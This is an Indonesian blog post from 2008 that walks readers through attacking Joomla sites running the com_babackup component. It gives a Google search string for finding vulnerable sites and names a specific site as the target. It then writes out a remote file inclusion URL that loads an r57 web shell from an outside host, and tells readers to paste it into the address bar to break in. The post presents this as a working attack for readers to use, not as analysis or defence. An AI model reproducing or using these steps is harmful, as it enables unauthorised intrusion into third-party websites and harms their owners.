March 30, 2008
Bugs On Joomla
Disini adalah contoh bugs yang terdapat pada CMS joomla di bagian "babackup" component joomla.
caranya mudah kok supaya bisa memakai bug itu cari aja software or components yang bersangkutan trus samain deh dengan bugnya .
http://www.milw0rm.com/exploits/2225 << dari sini kita bisa liat componenst yang berbug adalah com_babackup
nah kita pake key ini aja inurl:com_babackup
yang di dapat dari google.com
Index of /english/components/com_babackup
Index of /english/components/com_babackup. Name Last modified Size Description. Parent Directory 24-Jul-2007 10:13 -
www.myenglishgrammar.com/english/components/com_babackup/ - 1k - Tembolok - Halaman sejenis
xixi
coba kita samain dengan bug ya
Exploit:
http://www.site.com/[path]/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
ok kita implementasikan ke site target tadi yang udah kita dapet di google
www.myenglishgrammar.com/english/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=
http://geocities.com/home_edition2001/r57.txt?
Tinggal copy paste di Addresbar dan coba liat hasilnya. Kalo beruntung bisa masuk lahh tuh exploit
Comments »
The URI to TrackBack this entry is: http://jeky466.blogsome.com/2008/03/30/bugs-on-joomla/trackback/
yes
RSS feed for comments on this post.
allow a comment
Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

